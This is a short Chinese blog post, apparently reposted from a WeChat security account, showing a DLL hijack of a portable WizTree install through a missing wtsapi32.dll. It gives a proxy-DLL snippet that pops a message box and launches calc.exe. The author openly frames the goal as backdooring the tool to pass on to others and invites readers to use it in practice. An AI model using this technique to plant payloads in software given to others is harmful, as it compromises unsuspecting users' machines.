背景
今天磁盘提示没空间了,找天哥要了一份检查磁盘大文件的工具WizTree 。到手之后发现他把整个安装目录都打包过来,解压后主程序能直接运行。像这种开箱即用的软件想看看有没有可以利用点,比如弹个窗留个后门啥的,到时候发给别人
![一次 DLL 劫持实战]( "一次 DLL 劫持实战")
。
。目录内容挺简单的,locale文件夹是语言包。两个主程序,分别对应是32位和64位。
运行一下,检查加载Dll列表,看看有没有可以利用的。
C:WindowsSystem32wow64log.dllD:APPWizTreempr.dllD:APPWizTreeoleacc.dllD:APPWizTreewinmm.dllD:APPWizTreeversion.dllD:APPWizTreenetapi32.dllD:APPWizTreewinhttp.dllD:APPWizTreeSHFolder.dllD:APPWizTreeNETUTILS.DLLD:APPWizTreeOLEACCRC.DLLC:WindowsSysWOW64rpcss.dllD:APPWizTreewtsapi32.dllD:APPWizTreeWINSTA.dllD:APPWizTreeolepro32.dllD:APPWizTreeURL.DLLD:APPWizTreeIEFRAME.dllD:APPWizTreeiertutil.dllD:APPWizTreeUSERENV.dllD:APPWizTreeWKSCLI.DLLD:APPWizTreePROPSYS.dllD:APPWizTreeprofapi.dllD:APPWizTreeCFGMGR32.dllD:APPWizTreeedputil.dllD:APPWizTreeVAULTCLI.dllD:APPWizTreeurlmon.dllD:APPWizTreesrvcli.dllD:APPWizTreeSspiCli.dll
发现存在可劫持Dll
wtsapi32.dll 程序加载路径
D:APPWizTreewtsapi32.dll
主程序启动会加载路径当前路径下 wtsapi32.dll,但是当前目录下没有此Dll文件,根据Dll路径搜索目录顺序我们可以分析,主程序运行时加载wtsapi32.dll就是加载C:WindowsSystem32wtsapi32.dll 。
DLL路径搜索目录顺序1. 进程对应的应用程序所在目录2. 系统目录(即%windir%system32)3. 16位系统目录(即%windir%system)
制作恶意Dll,生成转发Dll代码(使用大佬工具一键生成)
修改代码实现弹窗和打开计算器
// 弹窗MessageBox(NULL, L"恭喜你中招了", L" Dll 劫持", MB_OK);// 执行exeSTARTUPINFO si = { sizeof(si) };PROCESS_INFORMATION pi;CreateProcess(TEXT("C:\Windows\System32\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);至于实战咋利用大家就各自发挥了,我相信大家骚操作很多,这里我就不献丑了,免得大家笑话。用到的工具Github上有很多,大家可以自行去下载,这里就不放出来了。
文章有点水,但是新鲜,就是今天上午的事。嘿嘿,主要是想提醒大家公众号换头像了
!
原文始发于微信公众号(backdoor):一次 DLL 劫持实战
!免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论